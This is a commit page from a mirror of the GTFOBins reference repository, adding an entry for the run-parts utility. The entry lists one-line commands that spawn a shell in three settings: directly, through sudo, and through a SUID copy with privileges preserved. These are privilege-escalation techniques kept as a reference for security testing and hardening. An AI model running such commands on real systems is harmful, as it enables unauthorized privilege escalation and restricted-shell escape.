mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add run-parts
This commit is contained in:
parent
3cbfa05169
commit
d5405933d1
9
_gtfobins/run-parts.md
Normal file
9
_gtfobins/run-parts.md
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: run-parts --new-session --regex '^sh$' /bin
|
||||||
|
sudo:
|
||||||
|
- code: sudo run-parts --new-session --regex '^sh$' /bin
|
||||||
|
suid:
|
||||||
|
- code: ./run-parts --new-session --regex '^sh$' /bin --arg='-p'
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user